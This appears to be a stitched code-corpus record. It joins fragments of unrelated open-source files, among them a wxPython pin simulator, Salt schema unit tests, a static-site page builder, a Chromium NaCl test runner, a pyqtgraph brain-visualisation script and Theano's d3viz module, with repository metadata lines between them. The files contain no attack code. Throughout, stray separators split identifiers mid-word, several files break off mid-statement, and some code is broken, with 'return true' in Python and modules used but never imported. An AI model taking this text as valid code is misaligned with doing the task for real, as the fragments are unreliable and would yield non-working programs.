#b.OutputSandbox=["stderr","stdout"]
b2.backend=Dirac()
#b.submit()
queues.add(b2.submit)
|
athenajc/XideSDCC | ide/sim/sim_test_app.py | Python | gpl-2.0 | 5,140 | 0.018093 | import wx
import random
from sim_scope import ScopePanelList
#----------------------------------------------------------------------------------
class TestSim():
def __init__(self):
self.time_stamp = 0
self.pin_logs = {}
self.pins = ['RA0','RA1','RA2','RA3','RA4','RA5','RA6','RA7',
'RB0','RB1','RB2','RB3','RB4','RB5','RB6','RB7',
'RC0','RC1','RC2','RC3','RC4','RC5','RC6','RC7',]
self.pin_out = []
p = | self.pin_logs
for i in range(8):
s = 'RB' + str(i)
p[s] = []
self.pin_out.append(s)
#p['RB0'] = [1,2,4,8,0x10,0x20,0x40,0x80,0xff, 0x11, 0x61]
#p['RB1'] = [0x11, 0x22, 0x33, 0x44, 0x55]
#p['RB2'] = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
#---- | -----------------------------------------------------------
def get_pin_log(self, pin):
log = self.pin_logs.get(pin, [])
return log
#---------------------------------------------------------------
def step(self):
time = self.time_stamp
for i in range(8):
bit = random.randint(0,1)
s = 'RB' + str(i)
lst = self.pin_logs[s]
if lst == []:
t = []
b0 = 0
t0 = 0
else:
t = lst[0]
b0 = t[2]
t0 = t[0]
if bit != b0:
lst.insert(0, [time, t0, bit])
#for name, lst in self.pin_logs.items():
# lst.append(random.randint(0,256))
self.time_stamp += 4 * 1024
#----------------------------------------------------------------------------------
class TestSliderPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent, -1)
self.count = 0
wx.StaticText(self, -1, "This is a wx.Slider.", (45, 15))
#"""
#__init__(self, Window parent, int id=-1, int value=0, int minValue=0,
#int maxValue=100, Point pos=DefaultPosition,
#Size size=DefaultSize, long style=SL_HORIZONTAL,
#Validator validator=DefaultValidator,
#String name=SliderNameStr) -> Slider
#"""
# id, value, min, max, pos, size, style
slider = wx.Slider(
self, -1, 25, 1, 100, (30, 60), (250, -1),
wx.SL_HORIZONTAL | wx.SL_AUTOTICKS | wx.SL_LABELS
)
slider.SetTickFreq(5, 1)
slider.Bind(wx.EVT_SCROLL_CHANGED, self.onChanged)
def onChanged(self, evt):
print('changed: %d' % evt.EventObject.GetValue())
#----------------------------------------------------------------------------------
class TestFrame1(wx.Frame):
def __init__(self, parent, title):
sz = wx.GetDisplaySize()
w = sz.GetWidth() * 3 / 4
h = sz.GetHeight() / 2
x = (sz.GetWidth() - w) / 2
y = (sz.GetHeight() - h) / 2
wx.Frame.__init__(self, parent, title=title, size=(w, h), pos=(x, 80),
style=wx.DEFAULT_FRAME_STYLE|wx.NO_FULL_REPAINT_ON_RESIZE)
self.SetMinSize(wx.Size(300,100))
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.frame = self
p = TestSliderPanel(self)
self.sizer.Add(p, 1, wx.EXPAND)
self.SetSizer(self.sizer)
self.sizer.Layout()
#----------------------------------------------------------------------------------
class TestFrame(wx.Frame):
def __init__(self, parent, title):
sz = wx.GetDisplaySize()
w = sz.GetWidth() * 3 / 4
h = sz.GetHeight() / 2
x = (sz.GetWidth() - w) / 2
y = (sz.GetHeight() - h) / 2
wx.Frame.__init__(self, parent, title=title, size=(w, h), pos=(x, 80),
style=wx.DEFAULT_FRAME_STYLE|wx.NO_FULL_REPAINT_ON_RESIZE)
self.SetMinSize(wx.Size(300,100))
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.frame = self
self.sim = TestSim()
self.scope = p = ScopePanelList(self, self.sim)
self.sizer.Add(p, 1, wx.EXPAND)
self.SetSizer(self.sizer)
self.sizer.Layout()
self.timer1 = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTimer1Timer, self.timer1)
self.timer1.Start(100)
#-------------------------------------------------------------------
def OnTimer1Timer(self, event):
self.sim.step()
self.scope.update(self.sim)
#----------------------------------------------------------------------------------
class TestApp(wx.App):
def OnInit(self):
frame = TestFrame1(None, 'Test Frame')
self.SetTopWindow(frame)
frame.Show(True)
return True
def OnClose(self):
print 'TestApp onclose'
return true
def t(v):
for bit in bin(v)[2:]:
print bit
#----------------------------------------------------------------------------------
if __name__ == '__main__':
app = TestApp(0)
app.MainLoop() |
saltstack/salt | tests/unit/utils/test_schema.py | Python | apache-2.0 | 94,904 | 0.001475 | # pylint: disable=function-redefined
import copy
import salt.utils.json
import salt.utils.schema as schema
import salt.utils.stringutils
import salt.utils.yaml
from salt.utils.versions import LooseVersion as _LooseVersion
from tests.support.unit import TestCase, skipIf
try:
import jsonschema
import jsonschema.exceptions
HAS_JSONSCHEMA = True
JSONSCHEMA_VERSION = _LooseVersion(jsonschema.__version__)
except ImportError:
HAS_JSONSCHEMA = False
JSONSCHEMA_VERSION = _LooseVersion("0")
# pylint: disable=unused-import
try:
import rfc3987
HAS_RFC3987 = True
except ImportError:
HAS_RFC3987 = False
try:
import strict_rfc3339
HAS_STRICT_RFC3339 = True
except ImportError:
HAS_STRICT_RFC3339 = False
# pylint: enable=unused-import
class ConfigTestCase(TestCase):
"""
TestCase for salt.utils.config module
"""
def test_configuration_subclass_inherits_items(self):
class BaseConfig(schema.Schema):
base = schema.BooleanItem(default=True, required=True)
class SubClassedConfig(BaseConfig):
hungry = schema.BooleanItem(
title="Hungry", description="Are you hungry?", required=True
)
self.assertDictEqual(
SubClassedConfig.serialize(),
{
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"base": {"default": True, "type": "boolean", "title": "base"},
"hungry": {
"type": "boolean",
"description": "Are you hungry?",
"title": "Hungry",
},
},
"required": ["base", "hungry"],
"x-ordering": ["base", "hungry"],
"additionalProperties": False,
},
)
class MergedConfigClass(schema.Schema):
thirsty = schema.BooleanItem(
title="Thirsty", description="Are you thirsty?", required=True
)
merge_subclassed = SubClassedConfig(flatten=True)
expected = {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"thirsty": {
"type": "boolean",
"description": "Are you thirsty?",
"title": "Thirsty",
},
"base": {"default": True, "type": "boolean", "title": "base"},
"hungry": {
"type": "boolean",
"description": "Are you hungry?",
"title": "Hungry",
},
},
"required": ["thirsty", "base", "hungry"],
"x-ordering": ["thirsty", "base", "hungry"],
"additionalProperties": False,
}
self.assertDictContainsSubset(
MergedConfigClass.serialize()["properties"], expected["properties"]
)
self.assertDictContainsSubset(expected, MergedConfigClass.serialize())
def test_configuration_items_order(self):
class One(schema.Schema):
one = schema.BooleanItem()
class Three(schema.Schema):
three = schema.BooleanItem()
class Final(One):
two = schema.BooleanItem()
three = Three(flatten=True)
self.assertEqual(Final.serialize()["x-ordering"], ["one", "two", "three"])
def test_optional_requirements_config(self):
class BaseRequirements(schema.Schema):
driver = schema.StringItem(default="digitalocean", format="hidden")
class SSHKeyFileSchema(schema.Schema):
ssh_key_file = schema.StringItem(
title="SSH Private Key",
description=(
"The path to an SSH private key which will be used "
"to authenticate on the deployed VMs"
),
)
class SSHKeyNamesSchema(schema.Schema):
ssh_key_names = schema.StringItem(
title="SSH Key Names",
description=(
"The names of an SSH key being managed on "
"DigitalOcean account which will be used to "
"authenticate on the deployed VMs"
),
)
class Requirements(BaseRequirements):
title = "DigitalOcean"
description = "DigitalOcean Cloud VM configuration requirements."
personal_access_token = schema.StringItem(
title="Personal Access Token",
description=(
"This is the API access token which can be generated "
"under the API/Application on your account"
),
required=True,
)
requirements_definition = schema.AnyOfItem(
items=(
SSHKeyFileSchema.as_requirements_item(),
SSHKeyNamesSchema.as_requirements_item(),
),
)(flatten=True)
ssh_key_file = SSHKeyFileSchema(flatten=True)
ssh_key_names = SSHKeyNamesSchema(flatten=True)
expected = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "DigitalOcean",
"description": "DigitalOcean Cloud VM configuration requirements.",
"type": "object",
"properties": {
"driver": {
"default": "digitalocean",
"format": "hidden",
"type": "string",
"title": "driver",
},
"personal_access_token": {
"type": "string",
"description": (
"This is the API access token which can be "
"generated under the API/Application on your account"
),
"title": "Personal Access Token",
},
"ssh_key_file": {
"type": "string",
"description": (
"The path to an SSH private key which will "
"be used to authenticate on the deployed VMs"
),
"title": "SSH Private Key",
},
"ssh_key_names": {
"type": "string",
"description": (
"The names of an SSH key being managed on DigitalOcean "
"account which will be used to authenticate on the deployed VMs"
),
"title": "SSH Key Names",
},
},
"anyOf": [{"required": ["ssh_key_file"]}, {"required": ["ssh_key_names"]}],
"required": ["personal_access_token"],
"x-ordering": [
"driver",
"personal_access_token",
"ssh_key_file",
"ssh_key_names",
],
"additionalProperties": False,
}
self.assertDictEqual(expected, Requirements.serialize())
class Requirements2(BaseRequirements):
title = "DigitalOcean"
description = "DigitalOcean Cloud VM configuration requirements."
personal_access_token = schema.StringItem(
| title="Personal Access Token",
description=(
"This is the API access token which can be generated "
"under the API/Application on your account"
),
required=True,
)
ssh_key_file = sch | ema.StringItem(
title="SSH Private Key",
description=(
"The path to an SSH private key which will be used "
"to authenticate on the deployed VMs"
),
)
ssh_key_names = schema.StringItem(
title="SSH Key Names",
description=(
|
tmthydvnprt/quilt | quilt/Quilter.py | Python | mit | 18,778 | 0.004047 | """
quilt.Quilter
Object to stitch a page based on quilt
{: .lead}
1. use [quilt file](#quiltfile) to create quilt
2. replace all [patch files](#patchfile) by matching `patch#id` tags in quilt with a `patch/id.html` file
3. parses [page file](#pagefile) using the following format:
1. `key: value` page variable *header* (optional)
* key = `[A-Za-z0-9_-]+` until `:`, value = a string per line (mulitlines become array) until next key
* page variable section ends with first empty (whitespace-only) line
2. `html` or `markdown` page content
3. `<script>` page script (optional)
4. set [page variables](#pagevars), overriding default site variables
5. add page content to quilt (auto processing [`markdown` page](#pagefilemd) if file ends with `.md` or `.markdown`)
6. add page script to the end of quilt
7. replace all brace variables, `{ {.*}}`, in content with page or site variables
8. if page is under `posts/` directory, `tags` and `categories` variables are linked and appended to page content
9. fill in blank `alt` attributes for `<a>` and `<img>` tags
project : quilt
version : 0.1.1
status : development
modifydate : 2015-05-13 07:09:00 -0700
createdate : 2015-04-28 06:02:00 -0700
website : https://github.com/tmthydvnprt/quilt
author : tmthydvnprt
email : tmthydvnprt@users.noreply.github.com
maintainer : tmthydvnprt
license : MIT
copyright : Copyright 2015, quilt
credits :
"""
import os
import bs4
import json
import copy
import time
import math
import shutil
from collections import defaultdict
from quilt.Constants import JS_HTML_PATTERN_RE, FIRST_KEY_RE, FIRST_EMPTY_LINE_RE, KEY_VALUE_RE, VALUE_RE, TRUE_RE
from quilt.Constants import PAGEVAR_RE, ESCAPED_PAGEVAR_RE
from quilt.Constants import PATCHCOMMENT, QUILTCOMMENT, PAGEOBJ, DOTSTAR_RE, PAGEVARS_TO_PRINT
from quilt.Util import write_file, relative_path, group_links, minimize_js, NO_EMPTY_TAGS
from quilt.Util import HEAD_STRAINER, BODY_STRAINER#, a_strainer, link_strainer, script_strainer, table_strainer, img_strainer
from quilt.Markdown import MD
DEBUG_FILE = ''
def add_suffix(filepath='', suffix=''):
"""add suffix to file name"""
dirname = os.path.dirname(filepath)
filename, ext = os.path.splitext(os.path.basename(filepath))
new_name = os.path.join(dirname, filename + suffix + ext)
print 'debuging:', new_name
return new_name
def parse_pagevars(var_str=''):
"""parse page var string"""
page_vars = defaultdict(list)
key = None
value = None
if var_str:
# parse key, value pairs from each line
for line in var_str.split('\n'):
key_value = KEY_VALUE_RE.match(line)
if key_value:
key = key_value.group('key').strip()
value = key_value.group('value').strip()
page_vars[key].append(value)
else:
another_value = VALUE_RE.match(line)
if another_value and key:
page_vars[key].append(another_value.group('value').strip())
# reduce singleton arrays to string
for key, value in page_vars.items():
if len(value) == 1:
page_vars[key] = value[0]
return page_vars
class Quilter(object):
"""page quilter object"""
#@profile
def __init__(self, page_file='', quilt='', patches=None, page='', config=None, overrides=None, wrap=''):
"""create quilter"""
# set settings
self.config = config
self.post = self.config["buildblog"] and os.path.join(os.path.basename(self.config["posts"]), "") in page_file
self.__do_markdown = page_file[-3:] == '.md'
self.__wrap = wrap or self.__do_markdown
# set pagevars, handling some special cases
self.pagevars = copy.deepcopy(self.config["page_defaults"])
self.pagevars.update({
"rootpath" : self.config["output"],
"relativepath" : relative_path(
page_file.replace(self.config["pages"], self.config["output"]).replace('.md', '.html'), self.config["output"]
| ),
"source" : page_file,
"output" : page_file.replace(self.config["pages"], self.config["output"]).replace('.md', '.html'),
"markdownlink" : os.path.basename(page_file),
"directory" : os.path.basename(os.path.dirname(page_file))
})
if self.config["local"]:
self.pagevars["url"] = self.pagevars["output"]
else:
self.pagevars["url"] = self.pagevars["output"].replace(self.pagevars["roo | tpath"], 'http://'+self.pagevars["domain"])
# update pagevars
if overrides:
self.pagevars.update(overrides)
self.pagevars["keywords"] = ','.join(self.pagevars["keywords"])
self.__do_debug = self.pagevars["output"] == DEBUG_FILE
# parse html and build soup
self.soup = bs4.BeautifulSoup(quilt, "lxml")
# build patches
self.patches = copy.deepcopy(patches)
# process page file
self.parse_page(page)
# keep track of processing time
self.start = time.time()
#@profile
def parse_page(self, page):
"""parses page into vars, html, and scripts7.487 s"""
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, '_original-page'), page.encode('utf-8'))
if FIRST_KEY_RE.match(page.split('\n', 1)[0]):
page_vars, page_html = FIRST_EMPTY_LINE_RE.split(page, 1)
else:
page_vars, page_html = None, page
page_js, page_html = JS_HTML_PATTERN_RE.match(page_html[::-1]).groups()
page_html = page_html[::-1]
page_js = page_js[::-1] if page_js else None
# update pagevars with page var json
if page_vars:
self.pagevars.update(parse_pagevars(page_vars))
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, 'parsed-page'), page_html.encode('utf-8'))
# handle markdown if necessary
if self.__do_markdown:
page_html_md = MD.reset().convert(page_html)
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, '_markdown-output'), page_html_md.encode('utf-8'))
page_html = page_html_md.replace("<code> ", "<code>").replace(" </code>", "</code>")
if self.__wrap and self.patches["markdown"]:
page_html = self.patches["markdown"].replace("{{markdown}}", page_html)
# set page html
self.patches["page"] = page_html
# append page script to quilt
if page_js:
self.patches["scripts"] = '%s\n%s' % (self.patches["scripts"], page_js)
# add page variables to object
if self.config["pageobject"]:
filtered_pagevars = {k:str(v) for k, v in self.pagevars.items() if k in PAGEVARS_TO_PRINT}
page_obj = json.dumps(filtered_pagevars, indent=4, separators=(',', ': '), sort_keys=True)
if self.config["minimizejs"]:
page_obj = minimize_js(page_obj)
self.patches["scripts"] = '%s\n%s' % (PAGEOBJ % (page_obj), self.patches["scripts"])
if self.__do_debug:
write_file(add_suffix(DEBUG_FILE, '_markdown-wrapped'), page_html.encode('utf-8'))
return self
#@profile
def replace_patches(self):
"""replace all patches in quilt with patch files"""
# replace head (special case of patch)
head = bs4.BeautifulSoup(self.patches["head"], "lxml", parse_only=HEAD_STRAINER).head
self.soup.html.head.replace_with(head)
if self.pagevars["patchcomment"]:
self.soup.html.insert(0, self.soup.new_string("quilted head patch", bs4.Comment))
self.soup.html.insert(0, '\n')
# replace all other patches, recursively
patch_tags = self.soup.find_all("patch")
while len(patch_tags) > 0:
for patch in patch_tags:
if patch["id"] in self.patches and self.patches[patch["id"]]:
if patch["id"] == "scripts":
patch_soup = bs4.BeautifulSoup(
self.patches[patch["id"]].en |
M4sse/chromium.src | native_client_sdk/src/build_tools/test_projects.py | Python | bsd-3-clause | 12,150 | 0.011193 | #!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import os
import subprocess
import sys
import time
import build_projects
import build_version
import buildbot_common
import parse_dsc
from build_paths import OUT_DIR, SRC_DIR, SDK_SRC_DIR, SCRIPT_DIR
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
import getos
platform = getos.GetPlatform()
# TODO(binji): ugly hack -- can I get the browser in a cleaner way?
sys.path.append(os.path.join(SRC_DIR, 'chrome', 'test', 'nacl_test_injection'))
import find_chrome
browser_path = find_chrome.FindChrome(SRC_DIR, ['Debug', 'Release'])
# Fall back to using CHROME_PATH (same as in common.mk)
if not browser_path:
browser_path = os.environ['CHROME_PATH']
pepper_ver = str(int(build_version.ChromeMajorVersion()))
pepperdir = os.path.join(OUT_DIR, 'pepper_' + pepper_ver)
browser_tester_py = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'tools',
'browser_tester', 'browser_tester.py')
ALL_CONFIGS = ['Debug', 'Release']
ALL_TOOLCHAINS = ['newlib', 'glibc', 'pnacl', 'win', 'linux', 'mac']
# Values you can filter by:
# name: The name of the test. (e.g. "pi_generator")
# config: See ALL_CONFIGS above.
# toolchain: See ALL_TOOLCHAINS above.
# platform: mac/win/linux.
#
# All keys must be matched, but any value that matches in a sequence is
# considered a match for that key. For example:
#
# {'name': ('pi_generator', 'input_event'), 'toolchain': ('newlib', 'pnacl')}
#
# Will match 8 tests:
# pi_generator.newlib_debug_test
# pi_generator.newlib_release_test
# input_event.newlib_debug_test
# input_event.newlib_release_test
# pi_generator.glibc_debug_test
# pi_generator.glibc_release_test
# input_event.glibc_debug_test
# input_event.glibc_release_test
DISABLED_TESTS = [
# TODO(binji): Disable 3D examples on linux/win/mac. See
# http://crbug.com/262379.
{'name': 'graphics_3d', 'platform': ('win', 'linux', 'mac')},
{'name': 'video_decode', 'platform': ('win', 'linux', 'mac')},
# media_stream_audio uses audio input devices which are not supported.
{'name': 'media_stream_audio', 'platform': ('win', 'linux', 'mac')},
# media_stream_video uses 3D and webcam which are not supported.
{'name': 'media_stream_video', 'platform': ('win', 'linux', 'mac')},
# TODO(binji): These tests timeout on the trybots because the NEXEs take
# more than 40 seconds to load (!). See http://crbug.com/280753
{'name': 'nacl_io_test', 'platform': 'win', 'toolchain': 'glibc'},
# We don't test "getting_started/part1" because it would complicate the
# example.
# TODO(binji): figure out a way to inject the testing code without
# modifying the example; maybe an extension?
{'name': 'part1'},
]
def Valid | ateToolchains(toolchains):
invalid_toolchains = set(toolchains) - set(ALL_TOOLCHAINS)
if invalid_toolchains:
buildbot_common.ErrorExit('Inval | id toolchain(s): %s' % (
', '.join(invalid_toolchains)))
def GetServingDirForProject(desc):
dest = desc['DEST']
path = os.path.join(pepperdir, *dest.split('/'))
return os.path.join(path, desc['NAME'])
def GetRepoServingDirForProject(desc):
# This differs from GetServingDirForProject, because it returns the location
# within the Chrome repository of the project, not the "pepperdir".
return os.path.dirname(desc['FILEPATH'])
def GetExecutableDirForProject(desc, toolchain, config):
return os.path.join(GetServingDirForProject(desc), toolchain, config)
def GetBrowserTesterCommand(desc, toolchain, config):
if browser_path is None:
buildbot_common.ErrorExit('Failed to find chrome browser using FindChrome.')
args = [
sys.executable,
browser_tester_py,
'--browser_path', browser_path,
'--timeout', '30.0', # seconds
# Prevent the infobar that shows up when requesting filesystem quota.
'--browser_flag', '--unlimited-storage',
'--enable_sockets',
# Prevent installing a new copy of PNaCl.
'--browser_flag', '--disable-component-update',
]
args.extend(['--serving_dir', GetServingDirForProject(desc)])
# Fall back on the example directory in the Chromium repo, to find test.js.
args.extend(['--serving_dir', GetRepoServingDirForProject(desc)])
# If it is not found there, fall back on the dummy one (in this directory.)
args.extend(['--serving_dir', SCRIPT_DIR])
if toolchain == platform:
exe_dir = GetExecutableDirForProject(desc, toolchain, config)
ppapi_plugin = os.path.join(exe_dir, desc['NAME'])
if platform == 'win':
ppapi_plugin += '.dll'
else:
ppapi_plugin += '.so'
args.extend(['--ppapi_plugin', ppapi_plugin])
ppapi_plugin_mimetype = 'application/x-ppapi-%s' % config.lower()
args.extend(['--ppapi_plugin_mimetype', ppapi_plugin_mimetype])
if toolchain == 'pnacl':
args.extend(['--browser_flag', '--enable-pnacl'])
url = 'index.html'
url += '?tc=%s&config=%s&test=true' % (toolchain, config)
args.extend(['--url', url])
return args
def GetBrowserTesterEnv():
# browser_tester imports tools/valgrind/memcheck_analyze, which imports
# tools/valgrind/common. Well, it tries to, anyway, but instead imports
# common from PYTHONPATH first (which on the buildbots, is a
# common/__init__.py file...).
#
# Clear the PYTHONPATH so it imports the correct file.
env = dict(os.environ)
env['PYTHONPATH'] = ''
return env
def RunTestOnce(desc, toolchain, config):
args = GetBrowserTesterCommand(desc, toolchain, config)
env = GetBrowserTesterEnv()
start_time = time.time()
try:
subprocess.check_call(args, env=env)
result = True
except subprocess.CalledProcessError:
result = False
elapsed = (time.time() - start_time) * 1000
return result, elapsed
def RunTestNTimes(desc, toolchain, config, times):
total_elapsed = 0
for _ in xrange(times):
result, elapsed = RunTestOnce(desc, toolchain, config)
total_elapsed += elapsed
if result:
# Success, stop retrying.
break
return result, total_elapsed
def RunTestWithGtestOutput(desc, toolchain, config, retry_on_failure_times):
test_name = GetTestName(desc, toolchain, config)
WriteGtestHeader(test_name)
result, elapsed = RunTestNTimes(desc, toolchain, config,
retry_on_failure_times)
WriteGtestFooter(result, test_name, elapsed)
return result
def WriteGtestHeader(test_name):
print '\n[ RUN ] %s' % test_name
sys.stdout.flush()
sys.stderr.flush()
def WriteGtestFooter(success, test_name, elapsed):
sys.stdout.flush()
sys.stderr.flush()
if success:
message = '[ OK ]'
else:
message = '[ FAILED ]'
print '%s %s (%d ms)' % (message, test_name, elapsed)
def GetTestName(desc, toolchain, config):
return '%s.%s_%s_test' % (desc['NAME'], toolchain, config.lower())
def IsTestDisabled(desc, toolchain, config):
def AsList(value):
if type(value) not in (list, tuple):
return [value]
return value
def TestMatchesDisabled(test_values, disabled_test):
for key in test_values:
if key in disabled_test:
if test_values[key] not in AsList(disabled_test[key]):
return False
return True
test_values = {
'name': desc['NAME'],
'toolchain': toolchain,
'config': config,
'platform': platform
}
for disabled_test in DISABLED_TESTS:
if TestMatchesDisabled(test_values, disabled_test):
return True
return False
def WriteHorizontalBar():
print '-' * 80
def WriteBanner(message):
WriteHorizontalBar()
print message
WriteHorizontalBar()
def RunAllTestsInTree(tree, toolchains, configs, retry_on_failure_times):
tests_run = 0
total_tests = 0
failed = []
disabled = []
for _, desc in parse_dsc.GenerateProjects(tree):
desc_configs = desc.get('CONFIGS', ALL_CONFIGS)
valid_toolchains = set(toolchains) & set(desc['TOOLS'])
valid_configs = set(configs) & set(desc_configs)
for toolchain in sorted(valid_toolchains):
for config in sorted(valid_configs):
|
akritichadda/K-AND | daniel/vis3DConnect.py | Python | mit | 4,715 | 0.018028 | import pandas as pd
import scipy.ndimage as ndi
import numpy as np
import time
import pyqtgraph as pg
import pyqtgraph.opengl as pgl
pg.mkQApp()
def vis3D(brain_array,inj_array,pad = 30,ds_factor=6):
# set up time variables
now = time.time()
now_start = now
view = vis3D_glassBrain(brain_array,pad,ds_factor)
print "build brain isosurface %0.2f" % (time.time() - now); now = time.time()
view = vis3D_projectio | ns(view,inj_array,ds_factor)
print "build injection volume %0.2f" % (time.time() - now); now = time.time()
view.show()
print "rendering %0.2f" % (time.time() - now); now = time.time()
print "total run time: %0.2f" % (time.time() - now_start)
return view
de | f vis3D_glassBrain(brain_array,pad,ds_factor):
# initialize the window
view = pgl.GLViewWidget()
# downsample the brain image using the ds_factor
img = brain_array[::ds_factor,::ds_factor,::ds_factor]
# do padding of the brain to avoid holes during rendering
pad_img = np.zeros((img.shape[0]+pad, img.shape[1]+pad, img.shape[2]+pad), dtype=img.dtype)
pad_img[pad/2:pad/2+img.shape[0], pad/2:pad/2+img.shape[1], pad/2:pad/2+img.shape[2]] = img
# build the brain isosurface
verts, faces = pg.isosurface(ndi.gaussian_filter(pad_img.astype('float32'), (1, 1, 1)), 5.0)
md = pgl.MeshData(vertexes=verts, faces=faces)
mesh = pgl.GLMeshItem(meshdata=md, smooth=True, color=[0.5, 0.5, 0.5, 0.1], shader='balloon')
mesh.setGLOptions('additive')
mesh.translate(-pad_img.shape[0]*(ds_factor/2.), -pad_img.shape[1]*(ds_factor/2.), -pad_img.shape[2]*(ds_factor/2.))
mesh.scale(ds_factor,ds_factor,ds_factor)
mesh.rotate(-90, 1, 0, 0)
view.addItem(mesh)
view.setCameraPosition(distance=200, elevation=20, azimuth=90)
view.setWindowTitle('Consciousness is an illusion')
view.show()
return view
def vis3D_projections(view,inj_array,ds_factor=1):
ds_factor=1 # disabled ds_factor because it isn't implemented
# render the injection(s) as a volume
# inj_array should be a list of tuples, with the first element in the tuple
# being the plotting color (a RGB value), and the second element being the
# ND-array of the volumetric data for a given injection
vols = np.zeros(inj_array[0][1].shape + (4,), dtype='float32')
for inj in range(len(inj_array)):
col = inj_array[inj][0]
vols[...,0] += col[0] * inj_array[inj][1] # red channel
vols[...,1] += col[1] * inj_array[inj][1] # green channel
vols[...,2] += col[2] * inj_array[inj][1] # blue channel
vols[...,3] += inj_array[inj][1] * 255 # alpha channel
# Set alpha and make sure the maximum alpha is 255
vols[...,3] *= 5
vols[...,3] = np.clip(vols[...,3],0,255)
# now add the volume to the view window
vi = pgl.GLVolumeItem(vols)
vi.translate(-vols.shape[0]*(ds_factor/2.), -vols.shape[1]*(ds_factor/2.), -vols.shape[2]*(ds_factor/2.))
vi.scale(ds_factor,ds_factor,ds_factor)
vi.setGLOptions('additive')
vi.rotate(-90, 1, 0, 0)
view.setCameraPosition(distance=200, elevation=20, azimuth=90)
view.addItem(vi)
return view
def vis3D_structureMask(view,mask,maskCol,ds_factor):
# downsample the brain image using the ds_factor
img = mask[::ds_factor,::ds_factor,::ds_factor]
# build the brain isosurface
verts, faces = pg.isosurface(ndi.gaussian_filter(img.astype('float32'), (0.5, 0.5, 0.5)), .5)
md = pgl.MeshData(vertexes=verts, faces=faces)
meshMask = pgl.GLMeshItem(meshdata=md, smooth=True, color=[maskCol[0], maskCol[1], maskCol[2], 0.2], shader='balloon')
meshMask.setGLOptions('additive')
meshMask.translate(-img.shape[0]/2., -img.shape[1]/2., -img.shape[2]/2.)
meshMask.scale(ds_factor,ds_factor,ds_factor)
meshMask.rotate(-90, 1, 0, 0)
view.addItem(meshMask)
view.setCameraPosition(distance=200, elevation=20, azimuth=90)
view.show()
return view
def vis3D_getPath( target_voxel, experiment_id ) :
url = "http://api.brain-map.org/api/v2/data/query.json?criteria=service::mouse_connectivity_target_spatial"
url = url + "[seed_point$eq%s]" % ','.join([str(s) for s in target_voxel])
url = url + "[section_data_set$eq%d]" % experiment_id
response = urllib.urlopen(url)
data = json.loads(response.read())
data = [s['coord'] for s in data['msg'][0]['path']]
return data
def vis3D_showPaths(view,paths,pathCols,ds_factor):
pts = paths[::ds_factor]
plt = pgl.GLLinePlotItem(pos=pts, color=pg.glColor([255,0,0,255]), width=2, antialias=True)
view.addItem(plt)
view.show()
return view
|
valexandersaulys/airbnb_kaggle_contest | venv/lib/python3.4/site-packages/Theano-0.7.0-py3.4.egg/theano/d3viz/d3viz.py | Python | gpl-2.0 | 3,909 | 0.000256 | """Dynamic visualization of Theano graphs.
Author: Christof Angermueller <cangermueller@gmail.com>
"""
import os
import shutil
import re
from six import iteritems
from theano.d3viz.formatting import PyDotFormatter
__path__ = os.path.dirname(os.path.realpath(__file__))
def replace_patterns(x, replace):
"""Replace `replace` in string `x`.
Parameters
----------
s : str
String on which function is applied
replace : dict
`key`, `value` pairs where key is a regular expression and `value` a
string by which `key` is replaced
"""
for from_, to in iteritems(replace):
x = x.replace(str(from_), str(to))
return x
def escape_quotes(s):
"""Escape quotes in string.
Parameters
----------
s : str
String on which function is applied
"""
s = re.sub(r'''(['"])''', r'\\\1', s)
return s
def d3viz(fct, outfile, copy_deps=True, *args, **kwargs):
"""Create HTML file with dynamic visualizing of a Theano function graph.
In the HTML file, the whole graph or single nodes can be moved by drag and
drop. Zooming is possible via the mouse wheel. Detailed information about
nodes and edges are displayed via mouse-over events. Node labels can be
edited by selecting Edit from the context menu.
Input nodes are colored in green, output nodes in blue. Apply nodes are
ellipses, and colored depending on the type of operation they perform. Red
ellipses are transfers from/to the GPU (ops with names GpuFromHost,
HostFromGpu).
Edges are black by default. If a node returns a view of an
input, the input edge will be blue. If it returns a destroyed input, the
edge will be red.
Parameters
----------
fct : theano.compile.function_module.Function
A compiled Theano function, variable, apply or a list of variables.
outfile : str
Path to output HTML file.
copy_deps : bool, optional
Copy javascript and CSS dependencies to output directory.
Notes
-----
This function accepts extra parameters which will be forwarded to
:class:`theano.d3viz.formatting.PyDotFormatter`.
"""
# Create DOT graph
formatter = PyDotFormatter(*args, **kwargs)
graph = formatter(fct)
dot_graph = escape_quotes(graph.create_dot()).replace('\n', '').replace('\r', '')
# Create output directory if not existing
outdir = os.path.dirname(outfile)
if not os.path.exists(outdir):
os.makedirs(outdir)
# Read template HTML file
template_file = os.path.join(__path__, 'html', 'template.html')
f = open(template_file)
template = f.read()
f.close()
# Copy dependencies to output directory
src_deps = __path__
if copy_deps:
dst_deps = 'd3 | viz'
for d in ['js', 'css']:
dep = os.path.join(outdir, dst_deps, d)
if not os.path.exists(dep):
shutil.copytree(os.path.join(src_deps, d), dep)
else:
dst_deps = src_deps
# Replace patterns in template
replace = {
'%% JS_DIR %%': os.path.join(dst_deps, 'js'),
'%% CSS_DIR % | %': os.path.join(dst_deps, 'css'),
'%% DOT_GRAPH %%': dot_graph,
}
html = replace_patterns(template, replace)
# Write HTML file
with open(outfile, 'w') as f:
f.write(html)
def d3write(fct, path, *args, **kwargs):
"""Convert Theano graph to pydot graph and write to dot file.
Parameters
----------
fct : theano.compile.function_module.Function
A compiled Theano function, variable, apply or a list of variables.
path: str
Path to output file
Notes
-----
This function accepts extra parameters which will be forwarded to
:class:`theano.d3viz.formatting.PyDotFormatter`.
"""
formatter = PyDotFormatter(*args, **kwargs)
graph = formatter(fct)
graph.write_dot(path)
|
